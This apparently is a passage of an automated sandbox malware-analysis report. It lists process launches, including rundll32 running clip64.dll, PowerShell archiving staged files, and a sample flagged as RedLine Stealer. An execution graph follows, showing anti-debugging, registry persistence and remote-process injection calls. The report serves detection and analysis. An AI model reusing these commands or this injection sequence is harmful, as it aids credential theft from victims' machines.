                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                                                                                                                                                                Imagebase:0xc70000
                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:30
                                                                                                                                                                Start time:19:37:36
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                                                                                                                                                                Imagebase:0xc70000
                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:31
                                                                                                                                                                Start time:19:37:37
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:32
                                                                                                                                                                Start time:19:37:37
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:33
                                                                                                                                                                Start time:19:37:37
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:34
                                                                                                                                                                Start time:19:37:37
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:36
                                                                                                                                                                Start time:19:37:47
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\10000820101\update.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\10000820101\update.exe"
                                                                                                                                                                Imagebase:0x7ff632ac0000
                                                                                                                                                                File size:308'224 bytes
                                                                                                                                                                MD5 hash:DD1E3F38AE7711D270748012AF613950
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 58%, ReversingLabs
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:37
                                                                                                                                                                Start time:19:37:47
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:38
                                                                                                                                                                Start time:19:37:47
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                Imagebase:0x7ff7a91b0000
                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:39
                                                                                                                                                                Start time:19:37:47
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                Imagebase:0x7ff7179d0000
                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:40
                                                                                                                                                                Start time:19:37:54
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\10000830101\update.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\10000830101\update.exe"
                                                                                                                                                                Imagebase:0x7ff7f7540000
                                                                                                                                                                File size:308'224 bytes
                                                                                                                                                                MD5 hash:DD1E3F38AE7711D270748012AF613950
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 58%, ReversingLabs
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:41
                                                                                                                                                                Start time:19:37:54
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:42
                                                                                                                                                                Start time:19:37:54
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                Imagebase:0x7ff7a91b0000
                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:43
                                                                                                                                                                Start time:19:37:54
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                Imagebase:0x7ff7179d0000
                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:44
                                                                                                                                                                Start time:19:38:01
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe"
                                                                                                                                                                Imagebase:0xef0000
                                                                                                                                                                File size:307'712 bytes
                                                                                                                                                                MD5 hash:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3006898229.00000000034C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe, Author: Joe Security
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                                                                Has exited:true

                                                                                                                                                                Reset < >

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:41.7%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:50.3%
                                                                                                                                                                  Total number of Nodes:483
                                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                                  execution_graph 838 7ff79e38345c 899 7ff79e3810a0 838->899 843 7ff79e38347c 1133 7ff79e384264 GetCurrentProcess OpenProcessToken 843->1133 844 7ff79e383474 ExitProcess 848 7ff79e383497 849 7ff79e3834ac 848->849 850 7ff79e3834fb 848->850 851 7ff79e3843a4 3 API calls 849->851 853 7ff79e38354c 850->853 854 7ff79e383510 850->854 852 7ff79e3834b8 851->852 855 7ff79e3834d2 ExitProcess 852->855 856 7ff79e3834bf 852->856 864 7ff79e3835a2 853->864 865 7ff79e383561 853->865 857 7ff79e3843a4 3 API calls 854->857 858 7ff79e3843a4 3 API calls 856->858 859 7ff79e38351c 857->859 860 7ff79e3834cb 858->860 861 7ff79e38352b 859->861 862 7ff79e383523 ExitProcess 859->862 860->855 863 7ff79e3834da 860->863 866 7ff79e38327c 20 API calls 861->866 1167 7ff79e3832ec 863->1167 1157 7ff79e383a74 864->1157 1148 7ff79e3843a4 CreateMutexA 865->1148 871 7ff79e383530 866->871 876 7ff79e383537 Sleep 871->876 877 7ff79e383544 ExitProcess 871->877 873 7ff79e3834df 879 7ff79e3834e6 Sleep 873->879 880 7ff79e3834f3 ExitProcess 873->880 874 7ff79e38357c 1152 7ff79e38327c 874->1152 875 7ff79e383574 ExitProcess 876->871 879->873 883 7ff79e383581 886 7ff79e383588 Sleep 883->886 887 7ff79e383595 ExitProcess 883->887 884 7ff79e38360e 7 API calls 885 7ff79e3835ba 888 7ff79e3843a4 3 API calls 885->888 886->883 889 7ff79e3835c6 888->889 890 7ff79e3835cd 889->890 891 7ff79e3835e0 ExitProcess 889->891 892 7ff79e3843a4 3 API calls 890->892 893 7ff79e3835d9 892->893 893->891 894 7ff79e3835e8 893->894 895 7ff79e3832ec 47 API calls 894->895 896 7ff79e3835ed 895->896 897 7ff79e3835f4 Sleep 896->897 898 7ff79e383601 ExitProcess 896->898 897->896 1176 7ff79e381000 LoadLibraryA GetProcAddress 899->1176 901 7ff79e38113a 1177 7ff79e381000 LoadLibraryA GetProcAddress 901->1177 903 7ff79e381154 1178 7ff79e381050 LoadLibraryA GetProcAddress 903->1178 905 7ff79e38116e 1179 7ff79e381050 LoadLibraryA GetProcAddress 905->1179 907 7ff79e381188 1180 7ff79e381050 LoadLibraryA GetProcAddress 907->1180 909 7ff79e3811a2 1181 7ff79e381050 LoadLibraryA GetProcAddress 909->1181 911 7ff79e3811bc 1182 7ff79e381050 LoadLibraryA GetProcAddress 911->1182 913 7ff79e3811d6 1183 7ff79e381050 LoadLibraryA GetProcAddress 913->1183 915 7ff79e3811f0 1184 7ff79e381050 LoadLibraryA GetProcAddress 915->1184 917 7ff79e38120a 1185 7ff79e381050 LoadLibraryA GetProcAddress 917->1185 919 7ff79e381224 1186 7ff79e381050 LoadLibraryA GetProcAddress 919->1186 921 7ff79e38123e 1187 7ff79e381000 LoadLibraryA GetProcAddress 921->1187 923 7ff79e381258 1188 7ff79e381000 LoadLibraryA GetProcAddress 923->1188 925 7ff79e381272 1189 7ff79e381000 LoadLibraryA GetProcAddress 925->1189 927 7ff79e38128c 1190 7ff79e381000 LoadLibraryA GetProcAddress 927->1190 929 7ff79e3812a6 1191 7ff79e381050 LoadLibraryA GetProcAddress 929->1191 931 7ff79e3812c0 1192 7ff79e381050 LoadLibraryA GetProcAddress 931->1192 933 7ff79e3812da 1193 7ff79e381050 LoadLibraryA GetProcAddress 933->1193 935 7ff79e3812f4 1194 7ff79e381050 LoadLibraryA GetProcAddress 935->1194 937 7ff79e38130e 1195 7ff79e381050 LoadLibraryA GetProcAddress 937->1195 939 7ff79e381328 1196 7ff79e381050 LoadLibraryA GetProcAddress 939->1196 941 7ff79e381342 1197 7ff79e381050 LoadLibraryA GetProcAddress 941->1197 943 7ff79e38135c 1198 7ff79e381050 LoadLibraryA GetProcAddress 943->1198 945 7ff79e381376 1199 7ff79e381050 LoadLibraryA GetProcAddress 945->1199 947 7ff79e381390 1200 7ff79e381050 LoadLibraryA GetProcAddress 947->1200 949 7ff79e3813aa 1201 7ff79e381050 LoadLibraryA GetProcAddress 949->1201 951 7ff79e3813c4 1202 7ff79e381050 LoadLibraryA GetProcAddress 951->1202 953 7ff79e3813de 1203 7ff79e381050 LoadLibraryA GetProcAddress 953->1203 955 7ff79e3813f8 1204 7ff79e381050 LoadLibraryA GetProcAddress 955->1204 957 7ff79e381412 1205 7ff79e381050 LoadLibraryA GetProcAddress 957->1205 959 7ff79e38142c 1206 7ff79e381050 LoadLibraryA GetProcAddress 959->1206 961 7ff79e381446 1207 7ff79e381050 LoadLibraryA GetProcAddress 961->1207 963 7ff79e381460 1208 7ff79e381050 LoadLibraryA GetProcAddress 963->1208 965 7ff79e38147a 1209 7ff79e381050 LoadLibraryA GetProcAddress 965->1209 967 7ff79e381494 1210 7ff79e381050 LoadLibraryA GetProcAddress 967->1210 969 7ff79e3814ae 1211 7ff79e381050 LoadLibraryA GetProcAddress 969->1211 971 7ff79e3814c8 1212 7ff79e381050 LoadLibraryA GetProcAddress 971->1212 973 7ff79e3814e2 1213 7ff79e381050 LoadLibraryA GetProcAddress 973->1213 975 7ff79e3814fc 1214 7ff79e381050 LoadLibraryA GetProcAddress 975->1214 977 7ff79e381516 1215 7ff79e381050 LoadLibraryA GetProcAddress 977->1215 979 7ff79e381530 1216 7ff79e381050 LoadLibraryA GetProcAddress 979->1216 981 7ff79e38154a 1217 7ff79e381050 LoadLibraryA GetProcAddress 981->1217 983 7ff79e381564 1218 7ff79e381050 LoadLibraryA GetProcAddress 983->1218 985 7ff79e38157e 1219 7ff79e381050 LoadLibraryA GetProcAddress 985->1219 987 7ff79e381598 1220 7ff79e381050 LoadLibraryA GetProcAddress 987->1220 989 7ff79e3815b2 1221 7ff79e381050 LoadLibraryA GetProcAddress 989->1221 991 7ff79e3815cc 1222 7ff79e381050 LoadLibraryA GetProcAddress 991->1222 993 7ff79e3815e6 1223 7ff79e381050 LoadLibraryA GetProcAddress 993->1223 995 7ff79e381600 1224 7ff79e381050 LoadLibraryA GetProcAddress 995->1224 997 7ff79e38161a 1225 7ff79e381050 LoadLibraryA GetProcAddress 997->1225 999 7ff79e381634 1226 7ff79e381050 LoadLibraryA GetProcAddress 999->1226 1001 7ff79e38164e 1227 7ff79e381050 LoadLibraryA GetProcAddress 1001->1227 1003 7ff79e381668 1228 7ff79e381050 LoadLibraryA GetProcAddress 1003->1228 1005 7ff79e381682 1229 7ff79e381050 LoadLibraryA GetProcAddress 1005->1229 1007 7ff79e38169c 1230 7ff79e381050 LoadLibraryA GetProcAddress 1007->1230 1009 7ff79e3816b6 1231 7ff79e381050 LoadLibraryA GetProcAddress 1009->1231 1011 7ff79e3816d0 1232 7ff79e381050 LoadLibraryA GetProcAddress 1011->1232 1013 7ff79e3816ea 1233 7ff79e381050 LoadLibraryA GetProcAddress 1013->1233 1015 7ff79e381704 1234 7ff79e381050 LoadLibraryA GetProcAddress 1015->1234 1017 7ff79e38171e 1235 7ff79e381050 LoadLibraryA GetProcAddress 1017->1235 1019 7ff79e381738 1236 7ff79e381050 LoadLibraryA GetProcAddress 1019->1236 1021 7ff79e381752 1237 7ff79e381050 LoadLibraryA GetProcAddress 1021->1237 1023 7ff79e38176c 1238 7ff79e381050 LoadLibraryA GetProcAddress 1023->1238 1025 7ff79e381786 1239 7ff79e381050 LoadLibraryA GetProcAddress 1025->1239 1027 7ff79e3817a0 1240 7ff79e381050 LoadLibraryA GetProcAddress 1027->1240 1029 7ff79e3817ba 1241 7ff79e381050 LoadLibraryA GetProcAddress 1029->1241 1031 7ff79e3817d4 1242 7ff79e381050 LoadLibraryA GetProcAddress 1031->1242 1033 7ff79e3817ee 1243 7ff79e381050 LoadLibraryA GetProcAddress 1033->1243 1035 7ff79e381808 1244 7ff79e381050 LoadLibraryA GetProcAddress 1035->1244 1037 7ff79e381822 1245 7ff79e381050 LoadLibraryA GetProcAddress 1037->1245 1039 7ff79e38183c 1246 7ff79e381050 LoadLibraryA GetProcAddress 1039->1246 1041 7ff79e381856 1247 7ff79e381050 LoadLibraryA GetProcAddress 1041->1247 1043 7ff79e381870 1248 7ff79e381050 LoadLibraryA GetProcAddress 1043->1248 1045 7ff79e38188a 1249 7ff79e381050 LoadLibraryA GetProcAddress 1045->1249 1047 7ff79e3818a4 1250 7ff79e381050 LoadLibraryA GetProcAddress 1047->1250 1049 7ff79e3818be 1251 7ff79e381050 LoadLibraryA GetProcAddress 1049->1251 1051 7ff79e3818d8 1252 7ff79e381050 LoadLibraryA GetProcAddress 1051->1252 1053 7ff79e3818f2 1253 7ff79e381050 LoadLibraryA GetProcAddress 1053->1253 1055 7ff79e38190c 1254 7ff79e381050 LoadLibraryA GetProcAddress 1055->1254 1057 7ff79e381926 1255 7ff79e381050 LoadLibraryA GetProcAddress 1057->1255 1059 7ff79e381940 1256 7ff79e381050 LoadLibraryA GetProcAddress 1059->1256 1061 7ff79e38195a 1257 7ff79e381050 LoadLibraryA GetProcAddress 1061->1257 1063 7ff79e381974 1258 7ff79e381050 LoadLibraryA GetProcAddress 1063->1258 1065 7ff79e38198e 1259 7ff79e381050 LoadLibraryA GetProcAddress 1065->1259 1067 7ff79e3819a8 1260 7ff79e381050 LoadLibraryA GetProcAddress 1067->1260 1069 7ff79e3819c2 1261 7ff79e381050 LoadLibraryA GetProcAddress 1069->1261 1071 7ff79e3819dc 1262 7ff79e381050 LoadLibraryA GetProcAddress 1071->1262 1073 7ff79e3819f6 1263 7ff79e381050 LoadLibraryA GetProcAddress 1073->1263 1075 7ff79e381a10 1264 7ff79e381050 LoadLibraryA GetProcAddress 1075->1264 1077 7ff79e381a2a 1265 7ff79e381050 LoadLibraryA GetProcAddress 1077->1265 1079 7ff79e381a44 1266 7ff79e381050 LoadLibraryA GetProcAddress 1079->1266 1081 7ff79e381a5e 1267 7ff79e381050 LoadLibraryA GetProcAddress 1081->1267 1083 7ff79e381a78 1268 7ff79e381050 LoadLibraryA GetProcAddress 1083->1268 1085 7ff79e381a92 1269 7ff79e381050 LoadLibraryA GetProcAddress 1085->1269 1087 7ff79e381aac 1270 7ff79e381050 LoadLibraryA GetProcAddress 1087->1270 1089 7ff79e381ac6 1271 7ff79e381050 LoadLibraryA GetProcAddress 1089->1271 1091 7ff79e381ae0 1272 7ff79e381050 LoadLibraryA GetProcAddress 1091->1272 1093 7ff79e381afa 1273 7ff79e381050 LoadLibraryA GetProcAddress 1093->1273 1095 7ff79e381b14 1274 7ff79e381050 LoadLibraryA GetProcAddress 1095->1274 1097 7ff79e381b2e 1275 7ff79e381000 LoadLibraryA GetProcAddress 1097->1275 1099 7ff79e381b48 1276 7ff79e381050 LoadLibraryA GetProcAddress 1099->1276 1101 7ff79e381b62 1277 7ff79e381050 LoadLibraryA GetProcAddress 1101->1277 1103 7ff79e381b7c 1278 7ff79e381050 LoadLibraryA GetProcAddress 1103->1278 1105 7ff79e381b96 1279 7ff79e381050 LoadLibraryA GetProcAddress 1105->1279 1107 7ff79e381bb0 1280 7ff79e381050 LoadLibraryA GetProcAddress 1107->1280 1109 7ff79e381bca 1281 7ff79e381050 LoadLibraryA GetProcAddress 1109->1281 1111 7ff79e381be4 1282 7ff79e381050 LoadLibraryA GetProcAddress 1111->1282 1113 7ff79e381bfe 1283 7ff79e381000 LoadLibraryA GetProcAddress 1113->1283 1115 7ff79e381c18 1284 7ff79e381000 LoadLibraryA GetProcAddress 1115->1284 1117 7ff79e381c32 1285 7ff79e381050 LoadLibraryA GetProcAddress 1117->1285 1119 7ff79e381c4c 1286 7ff79e381050 LoadLibraryA GetProcAddress 1119->1286 1121 7ff79e381c66 1287 7ff79e381050 LoadLibraryA GetProcAddress 1121->1287 1123 7ff79e381c80 1288 7ff79e381050 LoadLibraryA GetProcAddress 1123->1288 1125 7ff79e381c9a 1289 7ff79e381050 LoadLibraryA GetProcAddress 1125->1289 1127 7ff79e381cb4 1290 7ff79e381050 LoadLibraryA GetProcAddress 1127->1290 1129 7ff79e381cce 1130 7ff79e38321c IsDebuggerPresent 1129->1130 1131 7ff79e38322e GetCurrentProcess CheckRemoteDebuggerPresent 1130->1131 1132 7ff79e38322a 1130->1132 1131->1132 1132->843 1132->844 1134 7ff79e38428a GetTokenInformation 1133->1134 1136 7ff79e383481 1133->1136 1291 7ff79e383b54 VirtualAlloc 1134->1291 1144 7ff79e383ce4 GetModuleFileNameW 1136->1144 1137 7ff79e3842bb GetTokenInformation 1138 7ff79e3842e8 CloseHandle 1137->1138 1139 7ff79e384302 AdjustTokenPrivileges CloseHandle 1137->1139 1140 7ff79e383b24 VirtualFree 1138->1140 1292 7ff79e383b24 1139->1292 1141 7ff79e3842fd 1140->1141 1141->1136 1145 7ff79e383dd2 wcsncpy 1144->1145 1146 7ff79e383d0f PathFindFileNameW wcslen 1144->1146 1147 7ff79e383d49 1145->1147 1146->1147 1147->848 1149 7ff79e3843d0 GetLastError 1148->1149 1150 7ff79e38356d 1148->1150 1149->1150 1151 7ff79e3843dd CloseHandle 1149->1151 1150->874 1150->875 1151->1150 1295 7ff79e3838c4 1152->1295 1154 7ff79e38328c 1298 7ff79e3844b4 CreateFileW 1154->1298 1158 7ff79e383744 3 API calls 1157->1158 1159 7ff79e383a9f 1158->1159 1160 7ff79e3838c4 11 API calls 1159->1160 1161 7ff79e383aa9 GetModuleFileNameW DeleteFileW CopyFileW 1160->1161 1162 7ff79e383aeb SetFileAttributesW 1161->1162 1164 7ff79e3835a7 1161->1164 1315 7ff79e3839b4 RegOpenKeyExW 1162->1315 1165 7ff79e3833ec GetVersionExW 1164->1165 1166 7ff79e38341d 1165->1166 1166->884 1166->885 1168 7ff79e3838c4 11 API calls 1167->1168 1169 7ff79e3832fd 1168->1169 1318 7ff79e3846e4 CreateFileW 1169->1318 1171 7ff79e383315 1172 7ff79e383357 CreateThread 1171->1172 1330 7ff79e3840c4 1171->1330 1172->873 1176->901 1177->903 1178->905 1179->907 1180->909 1181->911 1182->913 1183->915 1184->917 1185->919 1186->921 1187->923 1188->925 1189->927 1190->929 1191->931 1192->933 1193->935 1194->937 1195->939 1196->941 1197->943 1198->945 1199->947 1200->949 1201->951 1202->953 1203->955 1204->957 1205->959 1206->961 1207->963 1208->965 1209->967 1210->969 1211->971 1212->973 1213->975 1214->977 1215->979 1216->981 1217->983 1218->985 1219->987 1220->989 1221->991 1222->993 1223->995 1224->997 1225->999 1226->1001 1227->1003 1228->1005 1229->1007 1230->1009 1231->1011 1232->1013 1233->1015 1234->1017 1235->1019 1236->1021 1237->1023 1238->1025 1239->1027 1240->1029 1241->1031 1242->1033 1243->1035 1244->1037 1245->1039 1246->1041 1247->1043 1248->1045 1249->1047 1250->1049 1251->1051 1252->1053 1253->1055 1254->1057 1255->1059 1256->1061 1257->1063 1258->1065 1259->1067 1260->1069 1261->1071 1262->1073 1263->1075 1264->1077 1265->1079 1266->1081 1267->1083 1268->1085 1269->1087 1270->1089 1271->1091 1272->1093 1273->1095 1274->1097 1275->1099 1276->1101 1277->1103 1278->1105 1279->1107 1280->1109 1281->1111 1282->1113 1283->1115 1284->1117 1285->1119 1286->1121 1287->1123 1288->1125 1289->1127 1290->1129 1291->1137 1293 7ff79e383b48 1292->1293 1294 7ff79e383b35 VirtualFree 1292->1294 1293->1136 1294->1293 1304 7ff79e383744 GetWindowsDirectoryW 1295->1304 1297 7ff79e3838f3 8 API calls 1297->1154 1299 7ff79e38452b GetLastError 1298->1299 1300 7ff79e38450a 1298->1300 1302 7ff79e38329f CreateThread Sleep 1299->1302 1309 7ff79e384404 GetFileSize 1300->1309 1302->883 1305 7ff79e38378e 1304->1305 1306 7ff79e383798 GetVolumeInformationW 1304->1306 1305->1306 1307 7ff79e383814 1306->1307 1308 7ff79e38387e wsprintfW 1307->1308 1308->1297 1314 7ff79e383b54 VirtualAlloc 1309->1314 1311 7ff79e384430 1312 7ff79e38447a CloseHandle 1311->1312 1313 7ff79e384444 SetFilePointer ReadFile 1311->1313 1312->1302 1313->1312 1314->1311 1316 7ff79e3839f9 RegSetValueExW RegCloseKey 1315->1316 1317 7ff79e3839f5 1315->1317 1316->1317 1317->1164 1319 7ff79e384745 GetFileSize GetProcessHeap RtlAllocateHeap 1318->1319 1320 7ff79e38473e 1318->1320 1321 7ff79e38478e CloseHandle 1319->1321 1322 7ff79e3847a0 ReadFile 1319->1322 1320->1171 1321->1320 1323 7ff79e3847c7 GetProcessHeap HeapFree CloseHandle 1322->1323 1324 7ff79e3847ef 1322->1324 1323->1320 1325 7ff79e384808 GetProcessHeap HeapFree CloseHandle 1324->1325 1327 7ff79e384830 1324->1327 1325->1320 1326 7ff79e38499b GetProcessHeap HeapFree CloseHandle 1326->1320 1327->1326 1328 7ff79e3848eb GetProcessHeap RtlAllocateHeap 1327->1328 1329 7ff79e384934 1328->1329 1329->1326 1345 7ff79e384004 CreateToolhelp32Snapshot 1330->1345 1333 7ff79e3840e4 1334 7ff79e38414b GetCurrentProcess OpenProcessToken 1333->1334 1335 7ff79e384168 LookupPrivilegeValueW 1334->1335 1336 7ff79e3841c2 OpenProcess 1334->1336 1337 7ff79e3841b7 CloseHandle 1335->1337 1338 7ff79e384190 AdjustTokenPrivileges 1335->1338 1339 7ff79e3841ee 1336->1339 1340 7ff79e3841e4 1336->1340 1337->1336 1338->1337 1339->1340 1344 7ff79e384222 WaitForSingleObject 1339->1344 1352 7ff79e382cb8 1339->1352 1342 7ff79e384244 CloseHandle 1340->1342 1343 7ff79e38424f 1340->1343 1342->1343 1343->1172 1344->1334 1344->1340 1346 7ff79e383342 1345->1346 1347 7ff79e38403f Process32FirstW 1345->1347 1346->1333 1348 7ff79e38405e wcscmp 1347->1348 1349 7ff79e384099 CloseHandle 1347->1349 1350 7ff79e384075 1348->1350 1351 7ff79e384082 Process32NextW 1348->1351 1349->1346 1350->1349 1351->1348 1351->1349 1353 7ff79e382d0b 1352->1353 1355 7ff79e382d4d VirtualAllocEx 1353->1355 1359 7ff79e382d2b 1353->1359 1360 7ff79e382a88 1353->1360 1356 7ff79e382d87 WriteProcessMemory 1355->1356 1355->1359 1357 7ff79e382dd0 VirtualProtectEx 1356->1357 1356->1359 1358 7ff79e382e03 CreateRemoteThread 1357->1358 1357->1359 1358->1353 1358->1359 1359->1339 1361 7ff79e382b01 1360->1361 1362 7ff79e382c0a StrStrA 1361->1362 1363 7ff79e382b08 1361->1363 1362->1361 1362->1363 1363->1353 1419 7ff79e381cdc 1420 7ff79e381d06 InternetOpenW 1419->1420 1421 7ff79e381d33 Sleep 1420->1421 1422 7ff79e381d40 InternetOpenUrlW 1420->1422 1421->1420 1423 7ff79e381dc9 HttpQueryInfoA 